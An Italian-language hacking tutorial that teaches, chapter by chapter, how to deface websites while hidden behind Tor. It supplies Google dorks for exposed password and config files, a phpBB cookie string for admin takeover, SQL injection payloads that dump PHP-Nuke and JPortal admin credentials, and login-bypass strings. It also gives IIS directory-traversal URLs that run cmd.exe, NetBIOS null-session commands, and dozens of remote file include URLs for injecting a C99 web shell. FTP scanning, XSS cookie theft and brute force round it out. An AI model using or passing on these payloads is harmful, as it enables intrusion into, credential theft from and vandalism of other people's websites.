{CAPITOLO 1}               GUIDA COMPLETA AL DEFACE

Prima di cominciare con la Pratica ovviamente ci tocca la Teoria!

Prima di tutto dovete sapere cosa significa DEFACE!

Deface significa in parole semplici HACKERARE UN SITO!

Questo è possibile grazie allo sfruttamento di BUG e di alcune tecniche

che andrò a spiegare DOPO!

In questa guida infatti vedremo come comportarci nelle diverse situazioni!

Utilizzeremo:Proxy,Exploit,GoogleHacker!

Tutto Spiegato!

Adesso mettiamoci all'opera!

In ogni Deface dovete sapervi PROXARE!

Nel Secondo capitolo studieremo proprio Questo!

Buona Lettura a tutti da Crashinside =)

{CAPITOLO 2}

In questo capitolo studieremo come PROXARCY!

Proxarcy deriva da PROXY!

Il proxy è un modo per camuffare il nostro IP dietro un altro così in rete quando

tenteremo un attacco non apparirà il nostro vero IP!

Per fare ciò consiglio di scaricare il programma "TOR"

(disponibile su www.crashinside.altervista.org)

Una volta scaricato avviamo l'installazione e spuntiamo

le caselle TOR e PRIVOXY che ve lo chiederà quando dovrete scegliere

i componenti da installare!

Ora,andate in C:ProgrammiTor e avviamo tor.exe

Vi dovrebbe apparire una schermata di DOS.

Ora andiamo in C:ProgrammiPrivoxy e avviamolo!

Si dovrebbe chiudere la schermata di DOS e ora andando nel Browser

e poi nelle opzioni PROXY inserire

HTTP Proxy: localhost

Port: 8118

Ora,aggiorniamo il Browser e andiamo su http://www.ilmioip.it/ e noteremo

un ip che non è nostro!

Bene!Adesso noteremo la connessione ultra lenta!Pultroppo i proxy sono così!

VORREI RICORDARE UNA COSA!

SE SIETE PROXATY E TENTATE AD ESEMPIO DI ENTRARE IN MSN NON VI FARà ENTRARE!

DOVRETE PRIMA DISATTIVARLI!

Ok,ora la nostra lezione sul Proxy è finita!

Adesso si fa sul serio!Ci vediamo nel prossimo capitolo

{CAPITOLO 3}

In questo capitoletto parleremo del GOOGLE HACKER!

E cioè???

Cioè che in questo capitolo vedremo come sfruttare GOOGLE

in un altro modo =)

Infatti inserendo alcune STRINGHE chiamate QUERY

potremo scovare SITI VULNERABILI,PASSWORD e tanto altro!

Io vi posto le Query più comuni,e vi spiegherò due comandini

molto utili!

Vi serve solo un pizzico di fantasia per ottenere tutto ciò che volete

ECCO LE QUERY:

allinurl:admin.php site:.edu

Filetype: trova archivio .pdf, .ps, .doc, .xls, .txt, .ppt, .rtf, .asp, .wpd...

"Index of /admin"

"Index of /root"

"Index of /password"

"Index of /" +passwd

allintitle: "index of/admin"

allintitle: restricted filetype:doc site:gov

intitle:"index of private"

allinurl:auth_user_file.txt

intitle:"Index of" config.php

intitle:index.of.etc

filetype:xls username password email

intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c

intitle:"Index of" ".htpasswd" htpasswd.bak

inurl:config.php dbuname dbpass

intitle:"Index of" master.passwd

intitle:"Index of" .mysql_history

intitle:"index of" trillian.ini

intitle:"Index of" spwd.db passwd -pam.conf

intitle:"Index of" pwd.db

intitle:"Index of" secring.bak

intitle:"Index of" "people.lst"

intitle:"Index of..etc" passwd

intitle:"Index of" passwd passwd.bak

intitle:index.of passlist

intitle:"Index of" .bash_history

intitle:"Index of" .sh_history

site:edu grades admin

filetype:htaccess basic

intitle:"Index of" finances.xls

"This report was generated by WebLog"

"phpinfo.php" –manual

intitle:Index.of robots.txt

intitle:"Index of" _vti_inf.html

intitle:"Index of" service.pwd

intitle:"Index of" shtml.dll

intitle:"Index of" shtml.exe

intitle:"Index of" fpcount.exe

intitle:"Index of" default.asp

intitle:"Index of" htimage.exe

intitle:"Index of" default.asp

intitle:"Index of" AT-admin.cgi

intitle:"Index of" glimpse

intitle:"Index of" guestbook.cgi

intitle:"Index of" perl

intitle:"Index of" show

intitle:"Index of" index.html~

intitle:"Index of" stats.html

inurl:shop "Hassan Consulting's Shopping Cart Version 1.18"

intitle:"Welcome to Windows 2000 Internet Services"

intitle:"Welcome to IIS 4.0"

"powered by openbsd" +"powered by apache"

"Powered by phpBB 2.0.0"

Le Query ALLINURL: e INURL: vi serviranno

se volete ricevere nelle vostre ricerche

i LINK contenete l'indirizzo che cercate allora

queste fanno a caso vostro!

Quindi se volete ad esempio scovare il modulo

login dell'admin(in siti ASP che vedremo più avanti)

utilizeremo in google:

Allinurl:/admin.asp

Inurl:/admin.asp

Ecc...

Spero di essere stato Chiaro!

Andiamo al prossimo capitolo dove cominceremo a fare sul serio

{CAPITOLO 4}

Ok,in questo capitolo cominciamo a imparare una Tecnica!

Roba facile

Infatti ci occuperemo di Defacciare Forum PhpBB sfruttando

un semplice BUG ovvero cambiando il codice GUEST in QUELLO ADMIN

nel file dei COOKIES

A,una cosa...non andate in crisi se non trovate forum vulnerabili

dato che al giorno d'oggi non ce ne sono tantissimi!

Potrete sempre usare il programma PHPBB DEFACER(disponibile nella sezione DOWNLOAD)

Per defacciare forum phpbb inferiori alla versione 2.0.10

Cominciamo Subito!

Ora in questo capitolo traccerò tutti i passaggi per defacciare i forum PHPBB

1)Andate su un motore di ricerca google o

altavista(consiglio altavista perchè trova + pagine di google quindi più possibilita

di trovare un forum vulnerabile)quindi prendiamo in esempio altavista www.altavista.com

2)Nella ricerca scrivete: Powered By Phpbb 1.0.12

3)Ora cercate un forum vi spiego un trukketto,vedete il link quello con + probabilita di defacing

sn qll ke nel link hanno ad es:

www.forum.com/index.php oppure www.forum.com/index.php?members ecc qnd trovate la 2 opzione cancellate ?members

e rimanete /index.php per arrivare alla pagina iniziale del forum!

4)Andate in C:Documents and SettingsUSERDati applicazioniMozillafirefoxLettereNumeri*(leggete in basso)

*=Dp firefox troverete una serie di lettere e numeri a random xco ogni cartella è diversa,ovviamente in

qst esempio abbiamo preso in esame il BROWSER MOZILLA!

5)Una volta entrato nella cartella clikkate su COOKIES.TXT fate ALT+T e inserite nella ricerca il nome

del sito ke volete defacciare xke in pratica qnd avete aperto il forum php per

l'identificazione vi ha registrato i cookie!

6)Una volta trovato controllate se vi appare una stringa tipo qst:

phpbb2mysql_data se ce l'ha il forum puo essere vulnerabile,dipende tutto dal codice Guest ke troverete

affianco,di solito è: a%3A07Bma puo essere anke diverso!

7)Una volta individuato il codice guest inserite al posto del codice questa

STRINGA:

##################################################################

#a%3A27Bs%3A1122autologinid%22%3Bb%3A1%3A622userid%22%3A1222%227D#

##################################################################

(Piccola parentesi,se al posto del codice GUEST troverete questa stringa,nn si fa niente,il forum nn è vulnerabile!)

8)Ora salvate i cookie(nn clikkate sulla [X] per uscire e fare salva xke mi è capitato d nn salvarmeli quindi FILE,SALVA)

9)Kiudete tt le pagine del browser ke avete,tutte quante altrimenti vi riportera i

cookie cm erano prima!(Naltra parentesi nn fate aggiorna xke nn funziona xD)

10)Riaprite il forum e dovreste essere ADMIN!

P.S nn sempre vi mette admin anke se trovate la data e il codice guest nn significa niente!

Volevo darvi un consiglio,se nel caso entrate cm admin e x caso nn vi esce il pannello admin 2 sn i motivi:

1)L'admin per sicurezza ha creato 1 account admin senza possibilita di entrare nel pannello o qlk del genere

2)Il pannello è nascosto(A ME è CAPITATO)!

Questa era una guida che avevo scritto gia e che potrete trovare sul mio sito!

www.crashinside.altervista.org

Passiamo subito al prossimo capitolo =)

{CAPITOLO 5}

Adesso faremo finta di trovare un sito che vogliamo Hackerare!

Facciamo finta che il sito sia www.sitovittima.it

Ora se il sito è in PHP-NUKE proxandoci

proviamo ad iniettare un SQL-INJECTION!

Ad esempio se il sito ha il motore di RICERCA potremmo iniettare SQL-INJECTION in questo modulo!

Ma,cosa è questo SQL-INJECTION?

L'Sql-Injection è un iniezione di codice e utilizzandolo

potremo riuscire a rubare Password hashate in MD5 ovviamente

contro la volontà del sito!

Ok,dopo questa piccola teoria sull'sql-injection inseriamo il seguente

CODICE(SQL-INJECTION) nel motore di ricerca:

##########################################

#p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*#

##########################################

Ovviamente senza i "#"

Adesso se il nostro SQL-INJECTION è andato a BUON FINE ci ritroveremo

uno o più password hashate in MD5 tanto quanto sono gli ADMIN,in più sotto

ci sarà scritto una cosa tipo "CONTRIBUTO DI ZAK" questo ZAK sarà proprio

l'username-admin che utilizzeremo per loggare con la sua password che ora è hashata!

Le password per riconoscerle sono fatte da NUMERI e LETTERE insieme

tipo come se fosse una STRINGA!

Adesso vi chiederete:

Ok,abbiamo sta password HASHATA ma non possiamo LOGGARE dato che è CRIPTATA

Che si fa??????

Bhè potremmo provare a DECRIPTARLA no?

Basta prendere un programmino come MD5 o CAIN & ABEL

(Tutti disponibili su www.crashinside.altervista.org)

inserire l'hash e decriptarlo!

Una volta decriptato basta andare nel modulo di login dell'admin(di solito /admin.php)

inseriamo username inseriamo quello che abbiamo trovato sotto la password

hashata,ovvero dove abbiamo trovato: "CONTRIBUTO DI ZAK"(ZAK è un PURO ESEMPIO!)

Adesso siamo entrati come ADMIN!

Ma,se non fosse Così?ad esempio,se non c'è il modulo SEARCH?

Bhè se non c'è possiamo provare a fare una cosa...

Andiamo ad esempio nel modulo DOWNLOAD

Notiamo l'indirizzo,ad esempio potremo trovare:

www.sitovittima.it/modules.php?name=Download

Se al posto di name=Download inseriamo "name=Search"

Se non si apre niente proviamo a mettere:

www.sitovittima.it/Search.php oppure www.sitovittima.it/index/Search.php

Se non ve lo apre o dice MODULO NON ATTIVO,con il search non si fa nulla!

Proviamo con la TOP10!

Il link della top10 è:

www.sitovittima.it/modules.php?name=Top

Facciamo la stessa cosa per il Search nel caso non ci fosse nella home il modulo Top10

Inseriamo affianco alla stringa modules.php?name=Top

il seguente SQL-INJECTION(SEMPRE DA PROXATY)

##############################################

#&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,

pwd,1,1%20FROM%20nuke_authors#

##############################################

Ora,nella parte dei SONDAGGI(mi sembra)dovreste trovare le Password Hashate!

Fate lo stesso procedimento di sopra e loggate come ADMIN!

VORREI RICORDARE UNA COSA:

AVVOLTE DOPO INIETTATO UN SQL-INJECTION POTREBBE USCIRE UN IMMAGINE CHE DICE

CHE VERRà CONTATTATA LA POLIZIA FBI O ROBA SIMILE!

NON SPAVENTATEVI,è SOLO PER SPAVENTARE

Ora,andiamo al capitolo successivo dove impararete a defacciare un sito in ASP!

{CAPITOLO 6}

In questo capitolo spiegherò come Defacciare siti in piattaforma ASP!

Questo è più semplice!

Ammettiamo il caso che il nostro caro sito(www.sitovittima.it)

sia in ASP,come si agisce?

Semplice,si tenta un ASP-INJECTION nel modulo di login admin!

Di solito è www.sitovittima.it/admin.asp oppure

www.sitovittima.it/login/admin.asp

Se non è così provate a cercare su GOOGLE: ADMIN SITOVITTIMA.IT o qualcosa

del genere,per far trovare il modulo di login dell'admin!

Ora iniettiamo l'ASP-INJECTION{L'ASP INJECTION è UGUALE ALL'SQL-INJECTION

SOLTANTO CHE OVVIAMENTE I CODICI SARANNO DIVERSI}

inserendo:

Username: admin

Password: ' or '

Adesso,dovrebbe entrarvi come admin!

Se non fosse così,bhè vediamo nei capitoli dove utilizzeremo

del deface avanzato!

Ora passiamo al prossimo Capitolo!

{CAPITOLO 7}

Bene,siamo giunti anche a questo capitolo

Ok,allora cominciamo subito!

Abbiamo tentato l'SQL-INJECTION ma non è andato

abbiamo tentato ASP-INJECTION e manco,allora che si fa?

Si usano metodi Drastici =D

Come si suol dire: "A MALI ESTREMI,ESTREMI RIMEDI" xD

Ok,abbiamo fatto la battuta mo vogliamo vede che dobbiamo fa?

Allora in questi casi se abbiamo fallito con asp e sql injection

Prima di tutto,prendiamo l'ip del sito da Defacciare,facendo finta che il sito sia www.sitovittima.it,in questo modo:

Apriamo il Prompt di Ms-Dos:

START-ESEGUI e scriviamo CMD

Ora scriviamo:

nslookup sitovittima.it

Il prompt risponderà:

Server: ns017dns.fastweb.it

Address: 62.101.81.80

Risposta da un server non di fiducia:

Nome: sitovittima.it

Addresses: 127.0.0.1

Ovviamente l'ip e il sito sono falsi quindi ho messo 127.0.0.1 come esempio

ora,noteremo che appariranno due IP!

Prendiamo il secondo IP,ovvero l'ip del sito!

Ora,ci potrebbe essere molto utile fare un WHOIS!

Piccola parentesi su cosa è il WHOIS:

Con il whois è possibile prendere i dati di registrazione al dominio del sito:

ad es: www.sitovittima.it,dato che è un dominio a pagamento e non gratis tipo altervista,

l'admin ha dovuto dare i propri dati,e quindi facendo un whois è possibile ricavare:

nome,cognome,indirizzo e tanto altro ancora!

Ora,effettuiamo il WHOIS da questo sito:

http://www.ripe.net/index.html

Bene,ora prendiamo un BUON PORT SCANNER(nella sezione Download potete prendere ad es RETINA!)

Facciamo uno scanner e così individueremo tutti i servizi sfruttati dal server!

Ad esempio ci uscirà:

21 [Ftp => File Transfer Protocol] 220 BulletProof FTP Server ready ...

22 [OpenSSH 3.1]

80 [Http => World Wide Web, HTTP]HTTP/1.1 400 Bad Request Server: Microsoft-IIS/5.1

135 [epmap => DCE endpoint resolution]

139 [Netbios-ssn => NETBIOS Session Service]

443 [HttpS => Secure HTTP]

445 [Microsoft-Ds]

Adesso si Attacca!

Per attaccare,vediamo se il sito è vulnerabile a qualche vulnerabilità tipo:

Xss,Remote File Include,Sql-Injection,Asp-Injection e così Via(TUTTE TECNICHE SPIEGATE IN GUIDE HACKER)

Se non è vulnerabile potremo provare utilizzando i famicerati EXPLOIT!

Andiamo su siti per Exploit e Vulnerabilità tipo:

www.milw0rm.com

www.securityreason.com

Adesso cerchiamo un exploit adatto ai dati presi,ovvero ai servizi sfruttati(CON IL PORTSCANNER) e al sistema operativo(DAL WHOIS)

e cominciamo a cercare un bel exploit!

Ora avviamo l'exploit,se funge Ok,ma se non funge potremo vedere ad esempio se il sito ha la porta 139 APERTA!

Ovvero quella di Netbios!

Se è così apriamo il prompt di ms-dos e scriviamo questo codice:

NET USE 192.10.10.1IPC$ "" /u:""

Se vi risponderà:

Esecuzione Comando Riuscita

Abbiamo effetuato una NULL SESSION

Piccola parentesi sulla NULL SESSION:

La NULL SESSION è una connessione stabilita sul netbios

senza essere registrati o altro!

Adesso vediamo i servizi publici del nostro amichetto Mr. Green

Scriviamo nel Prompt:

net view 127.0.0.1

Ci risponderà:

Risorse condivise su 127.0.0.1

Nome condivisione Tipo Utilizzato come Commento

-------------------------------------------------------

winnt Disco

SharedDocs Disco

Personale Disco

Esecuzione comando riuscita.

Bhè non dimentichiamoci che abbiamo trovato la porta 80 con il servizio

IIS!

Con questo servizio è possibile sfruttare una vulnerabilità per accedere a tutte

le directory!

Scriviamo nella barra indirizzi del browser uno dei seguenti "EXPLOIT"

Http://www.sitovittima.it/scripts/..%255c.. %255cwinnt/system32/cmd.exe?/c+dir+c:

Http://www.sitovittima.it/msadc/..%225c..%255c..%255c.. %255cwinnt/system32/cmd.exe?/c+dir+c:

Http://www.sitovittima.it/cgi-bin/..%225c..%255c..%255c.. %255cwinnt/system32/cmd.exe?/c+dir+c:

Http://www.sitovittima.it/_vti_cnf/…%255c....c..%255c..%255c.. %255cwinnt/system32/cmd.exe?/c+dir+c:

Http://www.sitovittima.it/_vti_bin/…%255c....c..%255c..%255c.. %255cwinnt/system32/cmd.exe?/c+dir+c:

Altrimenti se ha la porta 139 aperta

sempre su MILW0RM o SECURITYFOCUS troviamo degli exploit o bug per la 139!

Oppure,utilizzare il metodo per entrare nei FILE CONDIVISI

(c'è la guida ENTRARE IN UN HARD DISK TRAMITE NETBIOS nella sezione GUIDE HACKER)

{CAPITOLO 8}

In questo capitolo utilizzeremo il bug del REMOTE FILE INCLUDE!

Quindi utilizzeremo una SHELL:

Tra le più famose troviamo la C99 e la R57!

Nella sezione DOWNLOAD-PROGRAMMI HACKER E UTILITY le trovere 8)

Io consiglio la C99!

Facciamo un po di Teoria =)

#############################################

#La C99 è una shell fatta in PHP,che hostandola su un FTP e poi #

#sfruttando il BUG dell'autoiniezione (che ne parleremo più avanti)la#

#iniettate in 1 sito vulnerabile e vi ritroverete d'avanti come un #

#pannello,come se aveste l'FTP d'avanti! #

##############################################

Prima di tutto dopo aver scaricato la shell dobbiamo upparla su un FTP

cambiando l'estensione PHP perchè altrimenti la shell non si inietterà

in tutte le Directory!

Quindi rinominiamo la shell in:

C99.jpg

C99.txt

C99.gif

C99.bmp

E via dicendo....

Ora inserirò diversi "EXPLOIT" per sfruttare questo BUG!

Basta inserirli nel browser,dove c'è PATH sarebbe il percorso

tipo www.site.com/index/ ecc

Dove c'è www.site.com sarà il sito vittima

invece dove troveremo [EVIL_SCRIPT] dovrete inserire l'URL della shell che avete uppato

tipo se l'avete uppata su www.mysite.it/c99.txt inserirete ad esempio:

www.site.com/index/includes/content/contact_content.php?root_path=www.mysite.it/c99.txt

Se tutto va bene vi apparirà il pannello della C99!

ECCO GLI EXPLOIT:

##############################################

#http://www.site.com/[path]/adminpanel/includes/add_forms/addbioform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addfliersform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addgenmerchform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addinterviewsform.php?root_path=[evil script]#

#http://www.site.com/[path]/adminpanel/includes/add_forms/addlinksform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addlyricsform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addmembioform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchpicform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addnewsform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addphotosform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addreleaseform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addreleasepicform.php?root_path=[evil script]#

#http://www.site.com/[path]/adminpanel/includes/add_forms/addrelmerchform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addreviewsform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addshowsform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/add_forms/addwearmerchform.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/mailinglist/disphtmltbl.php?root_path=[evil script] #

#http://www.site.com/[path]/adminpanel/includes/mailinglist/dispxls.php?root_path=[evil script] #

#http://www.site.com/preload.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls #

#http://www.site.com/index.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls #

#http://www.site.com/missing.php?header_prog=[Evil_Script] #

#http://www.site.com/_inc/footer.php?theme_root=[Evil_Script] #

#http://www.site.com/_inc/header.php?mod_root=[Evil_Script] #

#http://www.site.com/_inc/header.php?theme_root=[Evil_Script] #

#http://www.site.com/_inc/pfooter.php?theme_root=[Evil_Script] #

#http://www.site.com/_inc/pheader.php?theme_root=[Evil_Script] #

#http://www.site.com/_inc/web_statsConfig.php?mod_dir=[Evil_Script] #

#http://www.site.com/_inc/web_statsConfig.php?php_ext=[Evil_Script] #

#http://www.site.com/_mods/email.php?header_prog=[Evil_Script] #

#http://www.site.com/_mods/files.php?header_prog=[Evil_Script] #

#http://www.site.com/_mods/files.php?footer_prog=[Evil_Script] #

#http://www.site.com/_mods/headlines.php?header_prog=[Evil_Script] #

#http://www.site.com/_mods/search.php?header_prog=[Evil_Script] #

#http://www.site.com/_mods/topics.php?header_prog=[Evil_Script] #

#http://www.site.com/_mods/users.php?header_prog=[Evil_Script] #

#http://www.site.com/[livehelperpath]/initiate.php?abs_path=[Evil_Script] #

#http://www.site.com/admanagerpro/common.php?ipath=[Evil_Script] #

#http://www.site.com/templates/deluxe/postreply.php?templatefolder=[Evil_Script] #

#http://www.site.com/templates/deluxe/posting.php?templatefolder=[Evil_Script] #

#http://www.site.com/templates/deluxe/pm/newpm.php?templatefolder=[Evil_Script] #

#http://www.site.com/templates/default/postreply.php?templatefolder=[Evil_Script] #

#http://www.site.com/templates/default/posting.php?templatefolder=[Evil_Script] #

#http://www.site.com/templates/default/pm/newpm.php?templatefolder=[Evil_Script] #

#http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts] #

#http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts] #

#############################################

cercare

la stringa "Remote File Include"

Per trovare siti vulnerabili ovviamente basta fare qualche ricerca

sfruttando il Google Hacker(Spiegato nel capitolo 3)

{CAPITOLO 9}

In questo capitolo ci occuperemo del PUB SCAN

Il pub scan è una tecnica che con un programmino(che dopo vedremo)

è possibile scannare(deriva da Scannerizzare) interi RANGE

di IP di siti per scovare siti con l'FTP dove si ha

l'accesso anonimo e il diritto di scrittura!

(ELIMINARE DIRECTORY,CREARE DIRECTORY,UPPARE FILE Ecc)

Scarichiamo il programmino GRIMS PING reperibile dal mio sito

oppure su questo link:

http://workshops.prohosting.com/dev/cgi-bi....cgi?PingMirror

Ora configuriamolo:

Installiamo il Grims Ping poi apriamolo e andiamo su:

OPTIONS-PREFERENCES

Ora la linguetta PUBFIND e poi su GENERAL

Dove c'è THREADS [5] TIMEOUT (S)[10]

Inseriamo al posto del 10 l'8!

Questo perchè troverà tutti i siti in quel TEMPO

che è un buon TEMPO!

Ora andiamo in PERMISSIONS e poi GENERAL

Spuntate il quadratino LOG DIRECTORY PERMISSIONS e poi su ADD

selezionate una DIRECTORY dove creare il file permissions.log

Questo infatti a fine SCAN premendo F2 vi appariranno tutti i siti

con diritto di SCRITTURA!

Ora come ultima cosa andiamo su PERMISSIONS e poi LOGGING

e spuntiamo tutte le caselle tranne:

EXCLUDE NONDELETABLE PUBS FROM LOG

EXCLUDE PUBS FROM ANONYMOUS LOG

Ora facciamo SAVE!

Ora clikkiamo in alto su PASTE IP

e inseriamo l'ip del sito!

Se non avete un TARGET preciso mettiamo un IP

possibilmente di siti,andiamo nel PROMPT DI DOS(START-ESEGUI-CMD)

e scriviamo NSLOOKUP Nomesito.it/com/org/net ecc

Prendiamo l'ip e magari se l'ip è:

123.4.5.6 mettiamo:

123.4.5.1

Così che ci scannerizzerà tutto il RANGE!(da 1 a 254)

Ora clikkiamo su ADD MULTIPLE RANGES

Ora clikkate sul SEMAFORO e comincia lo scan!

Alla fine premendo F2 vi appariranno i siti con diritto

di scrittura!

Quindi basterà inserire:

Ftp//IPSITO

per entrare con i permessi di SCRITTURA!

Bene,anche questa tecnica è stata spiegata

Andiamo avanti =)

{CAPITOLO 10}

In questo capitolo ci occuperemo dei siti in JPORTAL!

Cerchiamo sul nostro amato Google le seguenti QUERY:

Codice:

POWERED BY JPORTAL

Ora,vi uscira una lista di siti in JPORTAL!

Apriamone uno e inseriamo la seguente stringa nella barra indirizzi del browser:

Codice:

print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

dove c'è X inseriamo il numero ID dove (SE IL SITO è VULNERABILE)trovare user e pass dell'admin NON HASHATI!

Quindi proviamo a inserire 1 oppure 2 e vediamo se trovate qlk!

PICCOLO ESEMPIO

Facciamo finta di aver trovato www.sito.com ke è un jportal vulnerabile!

scriviamo:

Codice:

www.sito.com/print.php?what=article&id=2 AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

Dovrebbe uscire una scritta strana tipo araba e sotto

USER E PASS DELL'ADMIN!

Ora andiamo in www.sito.com/admin.php

e inseriamo i dati appena presi dal bug!

Ora avrete accesso al pannello di amministrazione!

Altra piccola tecnica di DEFACE

{CAPITOLO 11}

Bene,se siete riusciti ad arrivare fin quì,complimenti

Adesso,dato che siamo in TEMA di DEFACE inserirò anche

come DEFACCIARE I GUESTBOOK

Cerchiamo il LOGIN ADMIN per i guestbook

andando su google e inserendo una delle seguenti Query:

inurl:guestbook/admin/login.php

Alla schermata di login dell'admin del guestbook inserite questi dati:

USER: 'or 'jr7'='jr7' /*

PASSWORD: anything

QUERY PER LA RICERCA:

inurl:guestbook/admin/login.php

inurl:guestbook/admin.php

inurl:guestbook/login.php

guestbook/login.php

guestbook/admin.php

guestbook/login/admin.php

guestbook/admin/login.php

allinurl:/guestbook/login/admin.php

{CAPITOLO 12}

In questo capitolo ci occuperemo del bug XSS!

Il bug XSS puo essere sfruttato nei motori di RICERCA(non solo PHP-NUKE)

Ammettiamo che nel sito ci sia VALUE CERCA

Allora il codice sarà:

Nel value verrà ricordato il valore che avremo cercato se ad esempio

noi cerchiamo "DOWNLOAD"

Nella pagina del risultato il codice sarà:

Quindi possiamo iniettare qualsiasi codice,e il nostro obbiettivo

sarà iniettare un codice JAVASCRIPT,esempio:

window.alert("Hacked");

Se il sito sarà vulnerabile uscirà la scritta Hacked in un allert

Così noi possiamo sfruttare questo BUG per iniettare JAVASCRIPT cattivi

tipo per rubare cookie,password ecc...

Ora andiamo al prossimo capitolo

{CAPITOLO 13}

In questo capitolo ci occuperemo di un metodo DISPERATO

Ovvero il BRUTE FORCE!

Bhè non c'è molto da spiegare dato che è molto semplice!

Scaricate un programma BRUTE FORCE dal mio sito

sezione DOWNLOAD-PASSWORD inserite il link del sito

e cominciate a fare il BRUTE FORCE!

Il bruteforce è una tecnica che prova tutte le combinazioni

possibili fino a quando non trova quella giusta,ovvero la password del'ftp!

In molti programmi BruteForce potrete anche scegliere di fare un DICTIONARY ATTACK

ovvero prova tutte le combinazioni di parole che risiedono in un TXT chiamato

DIZIONARIO!

Questa lezione è finita!

Non c'era molto da dire,ma è giusto che conosciate anche questa tecnica!

{CAPITOLO 14}

BHè,prima di arrivare al 14esimo e ULTIMMO capitolo

dove ci simuleremo un attacco a un sito,

ci occuperemo degli EXPLOIT!

Gli exploit sono fondamentali se si vuole DEFACCIARE

un sito!

Dovete sapere che gli exploit più diffusi sono in:

-C

-C++

-PERL

Per eseguirli ovviamente bisogna avere un COMPILATORE!

Per exploit in C compilatore di C per PERL compilatore in PERL

e via dicendo!(TUTTO REPERIBILE SUL MIO SITO)

Una volta inserito il codice dell'exploit nel compilatore

bisogna compilaro e quindi renderlo un EXE!

Per eseguire un exploit in C dopo averlo compilato

e quindi ora mai diventato un .EXE(Eseguibile)

Andiamo nel PROMPT DI MS-DOS(START-ESEGUI-CMD)

Scriviamo quanto segue:

[CODICE]

Cd C:DIRECTORY DOVE C'è L'EXPLOIT .EXE(esempio:

Cd C:Documents and SettingsUserDesktopExploitsEXPLOIT.exe)

e premiamo INVIO

[FINE CODICE]

Adesso seguiamo le istruzioni ed eseguiamo il nostro EXPLOIT!

Per quelli in PERL bisogna avere l'INTERPRETE in PERL

Reperibile su:

http://activestate.com/Products/Download/D...x?id=ActivePerl

Adesso salviamo il codice dell'exploit su un BLOCCO NOTES

e salviamo con estensione .PL

Ora apriamo il PROMPT di MS-DOS(START-ESEGUI-CMD)

e scriviamo:

[CODICE]

Cd C:PerlBin

INVIO

Perl.exe EXPLOIT.PL

INVIO

[/CODICE]

L'exploit deve risedere per forza in C:PERLBIN

perchè è quì dove c'è L'exe per interpretare L'exploit!

Ora,seguiamo le istruzioni ed eseguiamo il nostro bel EXPLOIT!

Benissimo!

Avete imparato molte tecniche di DEFACE e non solo!

Adesso passiamo all'ultimo capitolo,ovvero dove simuleremo

un DEFACE! =)

{CAPITOLO 15}

Bene!

Siete arrivati fin quà ed ora?

Una simulazione di DEFACE!

Cominciamo subito!

In questa simulazione prenderemo di mira il sito

www.sitovittima.com

Cominciamo!

Ok,ora vediamo subito se il nostro sito è PHP-NUKE,ASP,HTML,PL Ecc

Se è PHP-NUKE proviamo subito con gli SQL-INJECTION

Se si tratta di un sito in ASP proviamo con ASP-INJECTION

Bhè se nel caso non funge ne SQL-INJECTION ne ASP-INJECTION

Possiamo provare con il PUB SCAN oppure la SHELL!

Se manco questo va si usa

Cominciamo a scannerizzare il sito!

Dopo troviamo le vulnerabilità su quei tipi di SERVIZI

(PORTE APERTE OGNI PORTA è UN SERVIZIO 80=HTTP ECC)

Se poi ha la porta 139aperta possiamo provare ad attakkare

tramite NETBIOS!

Poi se ha il servizio IIS utilizziamo i metodi del capitolo 7!

